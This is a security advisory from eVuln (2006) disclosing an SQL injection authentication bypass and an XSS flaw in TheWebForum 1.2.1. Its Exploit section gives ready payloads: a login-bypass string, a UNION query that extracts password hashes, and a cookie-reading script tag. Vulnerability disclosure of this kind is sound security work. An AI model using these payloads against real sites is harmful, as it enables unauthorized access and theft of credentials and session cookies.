New eVuln Advisory:
TheWebForum Script Insertion and Authentication Bypass
--------------------Summary----------------
Vendor: TheWebForum Group
Software: TheWebForum
Sowtware's Web Site: http://sourceforge.net/projects/twf/
Versions: 1.2.1
Critical Level: Moderate
Type: Multiple Vulnerabilities
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
Published: 2006.01.06
eVuln ID: EV0017
-----------------Description--------------
TheWebForum has multiple vulnerabilities.
1. SQL injection and authentication bypass.
Vulnerable script:
login.php
Variables $_POST['username'] or $u isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code and log in without password.
SQL Injection Condition: gpc_magic_quotes=off
2. Cross-Site Scripting
Vulnerable script: register.php
Variable $www isn't properly sanitized and may contain arbitrary html or script code.
--------------Exploit---------------------
Authentication bypass example (SQL Injection):
http://host/twf/login.php
User Name: a' or 'a'='a'/*
Password: anypassword
Get user's password hash example (SQL Injection):
http://host/twf/login.php
User Name: a' union select N,password,3 from users/*
User name will contain password's hash of user with ID=N
JavaScript insertion (XSS):
http://host/twf/register.php
Website value: <script>alert(document.cookie)</script>
--------------Solution---------------------
No Patch available.
--------------Credit---------------------
Original Advisory:
http://evuln.com/vulns/17/summary.html
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum